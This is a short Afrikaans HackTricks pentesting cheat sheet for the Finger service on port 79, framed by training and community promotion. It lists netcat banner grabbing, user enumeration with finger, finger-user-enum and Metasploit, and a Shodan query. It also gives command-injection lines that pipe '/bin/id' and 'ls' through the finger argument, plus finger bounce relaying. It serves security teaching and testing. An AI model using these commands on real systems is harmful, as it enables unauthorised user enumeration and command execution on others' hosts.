79 - Pentesting Finger
Reading time: 2 minutes
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Basiese Inligting
Die Finger program/dienst word gebruik om besonderhede oor rekenaargebruikers te verkry. Gewoonlik sluit die inligting wat verskaf word die gebruiker se aanmeldnaam, volle naam, en, in sommige gevalle, addisionele besonderhede in. Hierdie addisionele besonderhede kan die kantoor ligging en telefoonnommer (indien beskikbaar), die tyd wat die gebruiker aangemeld het, die periode van inaktiwiteit (idle time), die laaste keer wat die gebruiker e-pos gelees het, en die inhoud van die gebruiker se plan en projeklêers insluit.
Standaard poort: 79
PORT STATE SERVICE
79/tcp open finger
Opname
Banner Grabbing/Basiese verbinding
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Gebruiker enumerasie
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternatiewelik kan jy finger-user-enum van pentestmonkey gebruik, sommige voorbeelde:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap voer 'n skrip uit om standaard skripte te gebruik
Metasploit gebruik meer truuks as Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Opdrag uitvoering
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Vinger Bounce
Gebruik 'n stelsel as 'n vinger relais
finger user@host@victim
finger @internal@external
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.